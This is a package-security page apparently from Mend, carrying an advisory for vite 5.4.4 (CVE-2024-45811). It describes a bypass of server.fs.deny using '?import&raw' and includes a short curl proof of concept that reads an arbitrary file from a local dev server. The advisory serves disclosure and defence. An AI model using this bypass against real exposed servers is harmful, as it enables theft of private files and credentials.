npm - vite - Versions - 5.4.4 - Mend

See on npm

vite 5.4.4

1 security vulnerability found in version 5.4.4

Vite's `server.fs.deny` is bypassed when using `?import&raw`

medium severity CVE-2024-45811

Affected versions: >= 5.4.0, <= 5.4.5

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

No license issues detected.

This package version has a license in the source code.

This package version is available.

This package version has not been yanked and is still available for usage.